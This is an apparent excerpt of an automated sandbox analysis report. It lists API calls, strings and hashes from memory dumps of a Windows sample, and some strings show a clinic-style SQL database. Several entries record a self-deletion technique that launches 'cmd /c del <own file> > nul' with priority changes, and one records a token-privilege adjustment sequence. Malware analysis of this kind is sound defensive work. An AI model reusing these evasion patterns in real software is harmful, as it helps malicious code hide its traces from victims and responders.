                                • VariantCopy.OLEAUT32(?,00000000), ref: 006EA90E
                                • _com_issue_error.COMSUPPD ref: 006EA915
                                • VariantClear.OLEAUT32(?), ref: 006EA924
                                • VariantClear.OLEAUT32(?), ref: 006EA92E
                                • _com_util::ConvertStringToBSTR.COMSUPPD ref: 006EA94D
                                • VariantCopy.OLEAUT32(?,00000000), ref: 006EA971
                                • _com_issue_error.COMSUPPD ref: 006EA978
                                • VariantClear.OLEAUT32(?), ref: 006EA981
                                • VariantClear.OLEAUT32(?), ref: 006EA98B
                                • InterlockedIncrement.KERNEL32(?), ref: 006EAA84
                                  • Part of subcall function 006D1CE0: _com_issue_error.COMSUPPD ref: 006D1D12
                                • InterlockedDecrement.KERNEL32(?), ref: 006EAAA6
                                • SysFreeString.OLEAUT32(00000000), ref: 006EAAB7
                                • VariantClear.OLEAUT32(?), ref: 006EAB42
                                • VariantClear.OLEAUT32(?), ref: 006EAB48
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Variant$Clear$_com_issue_error$InterlockedString$ConvertCopyIncrementInit_com_util::$DecrementFree
                                • String ID: INSERT INTO Registration(RegId) Values($MaxId$Select COUNT(*) AS cnt,MAX(RegId) AS MaxId From Registration$__atl_condVal$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$cnt$nRefs != 0
                                • API String ID: 3325364930-3527277278
                                • Opcode ID: 5fab2ab69c3712e59dfb3f27be9229d8caf89c55b96a06534ed3f0cb6f547e96
                                • Instruction ID: 5ecda100a23d1ab1e4404593088515b2a899f04eec38307c793ab04983164312
                                • Opcode Fuzzy Hash: 5fab2ab69c3712e59dfb3f27be9229d8caf89c55b96a06534ed3f0cb6f547e96
                                • Instruction Fuzzy Hash: 5CC1F271D01748AFCB10DBE9CD41BDEB7B9AF58314F20451DE405A7381DB74AA05CBA2
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000615A
                                • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 10006177
                                • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104), ref: 10006196
                                • lstrcpyA.KERNEL32(?, /c del ), ref: 100061B0
                                • lstrcatA.KERNEL32(?,?), ref: 100061CA
                                • lstrcatA.KERNEL32(?, > nul), ref: 100061D8
                                • lstrcatA.KERNEL32(?,?), ref: 100061E8
                                • _memset.LIBCMT ref: 100061F2
                                • GetCurrentProcess.KERNEL32(00000100), ref: 1000622B
                                • SetPriorityClass.KERNEL32(00000000), ref: 10006234
                                • GetCurrentThread.KERNEL32 ref: 10006238
                                • SetThreadPriority.KERNEL32(00000000), ref: 10006245
                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,0000000C,00000000,00000000,00000044,00000000), ref: 10006264
                                • SetPriorityClass.KERNEL32(00000000,00000040), ref: 10006274
                                • SetThreadPriority.KERNEL32(?,000000F1), ref: 1000627C
                                • ResumeThread.KERNEL32(?), ref: 10006282
                                • GetCurrentProcess.KERNEL32(00000020), ref: 10006296
                                • SetPriorityClass.KERNEL32(00000000), ref: 10006299
                                • GetCurrentThread.KERNEL32 ref: 1000629D
                                • SetThreadPriority.KERNEL32(00000000), ref: 100062A4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: PriorityThread$Current$ClassProcesslstrcat$Name$CreateEnvironmentFileModulePathResumeShortVariable_memsetlstrcpy
                                • String ID: /c del $ > nul$COMSPEC$D
                                • API String ID: 78553958-850586679
                                • Opcode ID: fc25340417608eb713ebad66398225032bbf5edde6db7d824bad8f85022d6ab4
                                • Instruction ID: 56190780e49f3823f8a5b8feeeb16ceb6da61682ef5b69f115250614f28b93f3
                                • Opcode Fuzzy Hash: fc25340417608eb713ebad66398225032bbf5edde6db7d824bad8f85022d6ab4
                                • Instruction Fuzzy Hash: 06414171A00218BBEB20DBE4CC89FEE77B8EB48751F148559F605EA180DAB5DA44CB64
                                APIs
                                  • Part of subcall function 006FF640: IsWindow.USER32(?), ref: 006FF678
                                • _com_util::ConvertStringToBSTR.COMSUPPD ref: 006E515F
                                • _com_issue_error.COMSUPPD ref: 006E517A
                                • _com_util::ConvertBSTRToString.COMSUPPD ref: 006E518B
                                • InterlockedDecrement.KERNEL32(00000008), ref: 006E51AA
                                • SysFreeString.OLEAUT32(00000000), ref: 006E51BB
                                • VariantInit.OLEAUT32(?), ref: 006E51E9
                                • VariantClear.OLEAUT32(?), ref: 006E521B
                                • _com_issue_error.COMSUPPD ref: 006E5222
                                • VariantClear.OLEAUT32(?), ref: 006E52A6
                                • _com_issue_error.COMSUPPD ref: 006E52AD
                                • VariantClear.OLEAUT32(?), ref: 006E5334
                                • _com_issue_error.COMSUPPD ref: 006E533B
                                • VariantClear.OLEAUT32(?), ref: 006E53BA
                                • _com_issue_error.COMSUPPD ref: 006E53C1
                                • VariantClear.OLEAUT32(?), ref: 006E543C
                                • _com_issue_error.COMSUPPD ref: 006E5443
                                • VariantClear.OLEAUT32(?), ref: 006E54C1
                                • _com_issue_error.COMSUPPD ref: 006E54C8
                                • VariantClear.OLEAUT32(?), ref: 006E552C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Variant$Clear_com_issue_error$String$Convert_com_util::$DecrementFreeInitInterlockedWindow
                                • String ID: Where Name Like '%$__atl_condVal$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 1645834285-2074810242
                                • Opcode ID: bdcb8eeea81e224ae47af0be46f05a72df9abcf528859932e2c83ed6bc4b5bc7
                                • Instruction ID: 54f72551f08929312fd9aa2594020717ba7a27a5886d75c3b18f24b1c1a42c74
                                • Opcode Fuzzy Hash: bdcb8eeea81e224ae47af0be46f05a72df9abcf528859932e2c83ed6bc4b5bc7
                                • Instruction Fuzzy Hash: ED022571D02789EFCB10EBA8D841BEEB7BAAF18304F10851DE516A3381DB749E05CB65
                                APIs
                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,100094B4,10018C40,00000008,10009648,?,?,?,10018C60,0000000C,10009703,?), ref: 1000B4CB
                                • __mtterm.LIBCMT ref: 1000B4D7
                                  • Part of subcall function 1000B1A2: DecodePointer.KERNEL32(00000007,10009577,1000955D,10018C40,00000008,10009648,?,?,?,10018C60,0000000C,10009703,?), ref: 1000B1B3
                                  • Part of subcall function 1000B1A2: TlsFree.KERNEL32(0000001D,10009577,1000955D,10018C40,00000008,10009648,?,?,?,10018C60,0000000C,10009703,?), ref: 1000B1CD
                                  • Part of subcall function 1000B1A2: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,10009577,1000955D,10018C40,00000008,10009648,?,?,?,10018C60,0000000C,10009703,?), ref: 1000B9BE
                                  • Part of subcall function 1000B1A2: _free.LIBCMT ref: 1000B9C1
                                  • Part of subcall function 1000B1A2: DeleteCriticalSection.KERNEL32(0000001D,?,?,10009577,1000955D,10018C40,00000008,10009648,?,?,?,10018C60,0000000C,10009703,?), ref: 1000B9E8
                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1000B4ED
                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1000B4FA
                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 1000B507
                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1000B514
                                • TlsAlloc.KERNEL32(?,?,100094B4,10018C40,00000008,10009648,?,?,?,10018C60,0000000C,10009703,?), ref: 1000B564
                                • TlsSetValue.KERNEL32(00000000,?,?,100094B4,10018C40,00000008,10009648,?,?,?,10018C60,0000000C,10009703,?), ref: 1000B57F
                                • __init_pointers.LIBCMT ref: 1000B589
                                • EncodePointer.KERNEL32(?,?,100094B4,10018C40,00000008,10009648,?,?,?,10018C60,0000000C,10009703,?), ref: 1000B59A
                                • EncodePointer.KERNEL32(?,?,100094B4,10018C40,00000008,10009648,?,?,?,10018C60,0000000C,10009703,?), ref: 1000B5A7
                                • EncodePointer.KERNEL32(?,?,100094B4,10018C40,00000008,10009648,?,?,?,10018C60,0000000C,10009703,?), ref: 1000B5B4
                                • EncodePointer.KERNEL32(?,?,100094B4,10018C40,00000008,10009648,?,?,?,10018C60,0000000C,10009703,?), ref: 1000B5C1
                                • DecodePointer.KERNEL32(Function_0000B326,?,?,100094B4,10018C40,00000008,10009648,?,?,?,10018C60,0000000C,10009703,?), ref: 1000B5E2
                                • __calloc_crt.LIBCMT ref: 1000B5F7
                                • DecodePointer.KERNEL32(00000000,?,?,100094B4,10018C40,00000008,10009648,?,?,?,10018C60,0000000C,10009703,?), ref: 1000B611
                                • GetCurrentThreadId.KERNEL32 ref: 1000B623
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                • API String ID: 3698121176-3819984048
                                • Opcode ID: 88e44165efc2bccc50bfe5c5a375bdf1f80825bbf903b814980d43170aa44ac1
                                • Instruction ID: a1d5f80105c3de2ed9970943aa253ccbd963fadb572b7826cdb783fd8b18e3ed
                                • Opcode Fuzzy Hash: 88e44165efc2bccc50bfe5c5a375bdf1f80825bbf903b814980d43170aa44ac1
                                • Instruction Fuzzy Hash: FA314979801A31AEFB10FF7D8C84A4A3EE4EB457A1B148527E4149B2B4DF3AD441CF90
                                APIs
                                • IsWindow.USER32(?), ref: 006FF860
                                • GetParent.USER32(?), ref: 006FF8AB
                                • GetWindow.USER32(?,00000004), ref: 006FF8BF
                                • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 006FF8DB
                                • GetWindowLongA.USER32(00000000,000000F0), ref: 006FF92F
                                • MonitorFromWindow.USER32(?,00000001), ref: 006FF97B
                                • GetMonitorInfoA.USER32(00000000), ref: 006FF982
                                • LockFreeStack.LIBCMTD ref: 006FF98F
                                • GetWindowRect.USER32(00000000,?), ref: 006FF9AA
                                • MonitorFromWindow.USER32(00000000,00000002), ref: 006FF9BA
                                • GetMonitorInfoA.USER32(00000000), ref: 006FF9C1
                                • LockFreeStack.LIBCMTD ref: 006FF9CE
                                • GetParent.USER32(?), ref: 006FF9DF
                                • IsWindow.USER32(?), ref: 006FF9EC
                                • GetClientRect.USER32(?,?), ref: 006FFA12
                                • IsWindow.USER32(00000000), ref: 006FFA1C
                                • LockFreeStack.LIBCMTD ref: 006FF99B
                                  • Part of subcall function 0071F2E0: PeekMessageA.USER32(U0o,00000000,00000012,00000012,00000001), ref: 0071F2F4
                                  • Part of subcall function 0071F2E0: PostQuitMessage.USER32(?), ref: 0071F320
                                • GetClientRect.USER32(00000000,?), ref: 006FFA42
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 006FFA56
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$Monitor$FreeLockMessageRectStack$ClientFromInfoParent$LongPeekPointsPostQuitSend
                                • String ID: ($Cbo$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp
                                • API String ID: 1455012627-1855073590
                                • Opcode ID: 8b972969b4336c673af2c864fc7b79988f14bf403d2b4a05c1429af7958abd65
                                • Instruction ID: 5b4c200df49e2e154c2083d69f216838fdb16a1510ff09cbfdb0274ea1b9fce9
                                • Opcode Fuzzy Hash: 8b972969b4336c673af2c864fc7b79988f14bf403d2b4a05c1429af7958abd65
                                • Instruction Fuzzy Hash: B8A13C72D1020CEFCB14DFA8D889EEEBBB5BF48700F244669E605A7291DB349941DF50
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Variant$Clear$_com_issue_error$Init
                                • String ID: AND i.ItemName Like '%$From Items i,BaseType b Where b.TypeId=3 AND i.UnitId=b.Id$__atl_condVal$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 3411381055-873876045
                                • Opcode ID: ce3239c9678cb5b0a0c5d28abd58e81cc4c3a3f9e0e88be557fd5bbbbde670f2
                                • Instruction ID: 161446662b347181acc6febe35072e197f8e0239676563aced0a15d4c699935a
                                • Opcode Fuzzy Hash: ce3239c9678cb5b0a0c5d28abd58e81cc4c3a3f9e0e88be557fd5bbbbde670f2
                                • Instruction Fuzzy Hash: BF022634D1024AAECF14EBA8D811BFEB7BAAF19320F04451EE511A33C1DB749A05C769
                                APIs
                                  • Part of subcall function 006D22B0: CoInitialize.OLE32(00000000), ref: 006D22E0
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2322
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D233E
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2375
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D2392
                                  • Part of subcall function 006D22B0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D23C8
                                  • Part of subcall function 006D22B0: _com_issue_error.COMSUPPD ref: 006D23E5
                                  • Part of subcall function 006D2EF0: _com_util::ConvertBSTRToString.COMSUPPD ref: 006D2F2C
                                  • Part of subcall function 006D2EF0: InterlockedDecrement.KERNEL32(00000000), ref: 006D2F4E
                                  • Part of subcall function 006D2EF0: SysFreeString.OLEAUT32(00000000), ref: 006D2F63
                                  • Part of subcall function 006D2EF0: _com_util::ConvertStringToBSTR.COMSUPPD ref: 006D2FB4
                                  • Part of subcall function 006D2EF0: _com_issue_error.COMSUPPD ref: 006D2FD1
                                • InterlockedIncrement.KERNEL32(-00000008), ref: 006EF38E
                                • _com_issue_error.COMSUPPD ref: 006EF3F4
                                • _com_util::ConvertStringToBSTR.COMSUPPD ref: 006EF450
                                • _com_util::ConvertBSTRToString.COMSUPPD ref: 006EF48B
                                • InterlockedDecrement.KERNEL32(?), ref: 006EF4D1
                                • SysFreeString.OLEAUT32(00000000), ref: 006EF4E6
                                • VariantClear.OLEAUT32(?), ref: 006EF516
                                • VariantClear.OLEAUT32(?), ref: 006EF520
                                • _com_util::ConvertStringToBSTR.COMSUPPD ref: 006EF530
                                • _com_util::ConvertBSTRToString.COMSUPPD ref: 006EF56C
                                • InterlockedDecrement.KERNEL32(?), ref: 006EF59A
                                • SysFreeString.OLEAUT32(00000000), ref: 006EF5AF
                                • VariantClear.OLEAUT32(?), ref: 006EF5D9
                                • VariantClear.OLEAUT32(?), ref: 006EF5E3
                                • InterlockedDecrement.KERNEL32(-00000008), ref: 006EF60B
                                • SysFreeString.OLEAUT32(00000000), ref: 006EF61C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: String$Convert_com_util::$Interlocked_com_issue_error$ClearDecrementFreeVariant$IncrementInitialize
                                • String ID: Pwd$SELECT * FROM Users WHERE UserName='$User_type$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 3618518584-1361752317
                                • Opcode ID: dc7a0a1550bfcfd251555c60b3ed007c330908f148d13b3ad07d557808eb25c7
                                • Instruction ID: dd15c37ebb3f10ebbc750d9466b18bfc3eb7df5630cdbe317c7a627555ea2449
                                • Opcode Fuzzy Hash: dc7a0a1550bfcfd251555c60b3ed007c330908f148d13b3ad07d557808eb25c7
                                • Instruction Fuzzy Hash: E7E11271D02745DFCB20DFA9C845BAFB7BAAF64314F10852CE815A7381DB74AA04CBA1
                                APIs
                                • _memset.LIBCMT ref: 10004330
                                • _memset.LIBCMT ref: 10004348
                                • _memset.LIBCMT ref: 10004360
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,7555B5F0,0000005C), ref: 10004375
                                • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 1000438A
                                • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104,?,?,?,?,?,?,?,7555B5F0,0000005C), ref: 100043A1
                                • lstrcatA.KERNEL32(?,/c del ,?,?,?,?,?,?,?,7555B5F0,0000005C), ref: 100043B9
                                • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,7555B5F0,0000005C), ref: 100043C9
                                • lstrcatA.KERNEL32(?, > nul,?,?,?,?,?,?,?,7555B5F0,0000005C), ref: 100043D7
                                • ShellExecuteExA.SHELL32(?,?,?,?,?,?,?,?,7555B5F0,0000005C), ref: 1000440D
                                • SetPriorityClass.KERNEL32(100048E2,00000040,?,?,?,?,?,?,?,7555B5F0,0000005C), ref: 10004423
                                • GetCurrentProcess.KERNEL32(00000100,?,?,?,?,?,?,?,7555B5F0,0000005C), ref: 1000442A
                                • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,?,?,7555B5F0,0000005C), ref: 10004431
                                • GetCurrentThread.KERNEL32 ref: 10004435
                                • SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,7555B5F0,0000005C), ref: 1000443C
                                • SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 1000444E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Priority_memsetlstrcat$ClassCurrentNameThread$ChangeEnvironmentExecuteFileModuleNotifyPathProcessShellShortVariable
                                • String ID: > nul$/c del $<$@$COMSPEC
                                • API String ID: 1015325696-3567428472
                                • Opcode ID: 47b74d52d5c29dc53a00aeb1638d75a9e817765ea7e08f9db1db85fd5897d41c
                                • Instruction ID: 4926c8e992e619f16ab399c40cbce01d6c76fa17d93dbb496ddfbb39dc5e8bcb
                                • Opcode Fuzzy Hash: 47b74d52d5c29dc53a00aeb1638d75a9e817765ea7e08f9db1db85fd5897d41c
                                • Instruction Fuzzy Hash: B6311DB2900228BBEB15DBA5DC85FDDBBBCEB08701F444099F61DAA150D775AB84CF60
                                APIs
                                Strings
                                • c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h, xrefs: 006EB867, 006EBC86
                                • __atl_condVal, xrefs: 006EB85C
                                • nRefs != 0, xrefs: 006EBC7D
                                • WHERE ps.RegId=r.RegId AND r.PatId=p.Id AND r.DocId=d.Id AND d.Id=b.Id , xrefs: 006EB8C7
                                • (SELECT RegId,Sum(PNum*Price) AS SumReg FROM PayItems GROUP BY RegId) ps, xrefs: 006EB8B8
                                • AND b.TypeId=1 ORDER BY r.RegDate DESC, xrefs: 006EB8D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.3459143399.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                                • Associated: 00000000.00000002.3459123897.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459317099.000000000092A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459385951.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3459417926.00000000009E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6d0000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: Variant$Clear$_com_issue_error$Init
                                • String ID: (SELECT RegId,Sum(PNum*Price) AS SumReg FROM PayItems GROUP BY RegId) ps$ AND b.TypeId=1 ORDER BY r.RegDate DESC$ WHERE ps.RegId=r.RegId AND r.PatId=p.Id AND r.DocId=d.Id AND d.Id=b.Id $__atl_condVal$c:\Program Files\Microsoft Visual Studio 10.0\VC\atlmfc\include\atlsimpstr.h$nRefs != 0
                                • API String ID: 3411381055-1488452537
                                • Opcode ID: bc959ce54b4ef0530185f0ac7b910f6aec4b63a7b2d44ca9ac240d27e32f2363
                                • Instruction ID: b242d63be04dbaeb9a608e607ec0b9f0280dc2f3dd93f575aacb0ad37f0ad290
                                • Opcode Fuzzy Hash: bc959ce54b4ef0530185f0ac7b910f6aec4b63a7b2d44ca9ac240d27e32f2363
                                • Instruction Fuzzy Hash: BAD12170D25288ABCF14EBA8D851AFEB7BABF18300F44451DF201A32D1EB749A45C769
                                APIs
                                • LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 100071B8
                                • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 100071C8
                                • GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 100071D3
                                • GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 100071DE
                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 100071E8
                                • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 100071F3
                                • LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 10007245
                                • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 1000724D
                                • CloseHandle.KERNEL32(?), ref: 10007260
                                • FreeLibrary.KERNEL32(00000000), ref: 10007271
                                • FreeLibrary.KERNEL32(?), ref: 1000727B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3460317210.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.3460303620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460349424.000000001001B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.3460364367.0000000010020000.00000002.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryProc$Load$Free$CloseHandle
                                • String ID: ADVAPI32.dll$AdjustTokenPrivileges$GetCurrentProcess$GetLastError$KERNEL32.dll$LookupPrivilegeValueA$OpenProcessToken$kernel32.dll
                                • API String ID: 2887716753-1648388921
                                • Opcode ID: fb51e46fa82035abde6777898ca089b2ae1a23f91f3838e84d9ee34fed1df4a9
                                • Instruction ID: a99884b9c6ce80b368c5e52d65a18c24792203dfe1cdf046151dc699498c5b7f
                                • Opcode Fuzzy Hash: fb51e46fa82035abde6777898ca089b2ae1a23f91f3838e84d9ee34fed1df4a9
                                • Instruction Fuzzy Hash: CA216571E40218BBDB00DBF5CC45FEEBBB8EF89651F144156F604AB140D679D9408BA0
                                APIs
                                  • Part of subcall function 006FF640: IsWindow.USER32(?), ref: 006FF678
                                • VariantInit.OLEAUT32(?), ref: 006E4A7A
                                • VariantClear.OLEAUT32(?), ref: 006E4AAC
                                • _com_issue_error.COMSUPPD ref: 006E4AB3
                                • VariantClear.OLEAUT32(?), ref: 006E4B38
                                • _com_issue_error.COMSUPPD ref: 006E4B3F
                                • VariantClear.OLEAUT32(?), ref: 006E4BC2
                                • _com_issue_error.COMSUPPD ref: 006E4BC9
                                • VariantClear.OLEAUT32(?), ref: 006E4C50
                                • _com_issue_error.COMSUPPD ref: 006E4C57
                                • VariantClear.OLEAUT32(?), ref: 006E4CD2
                                • _com_issue_error.COMSUPPD ref: 006E4CD9
